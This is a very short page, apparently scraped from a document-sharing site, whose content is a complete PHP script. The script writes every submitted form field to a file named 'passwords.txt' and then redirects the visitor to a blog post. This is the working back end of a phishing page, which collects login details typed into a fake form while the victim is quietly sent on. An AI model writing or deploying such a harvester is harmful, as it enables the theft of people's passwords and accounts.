You are on page 1of 1

<?php header ('Location:2012/02/blog-post.html'); $handle = fopen("passwords.

txt", "a" ); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>

You might also like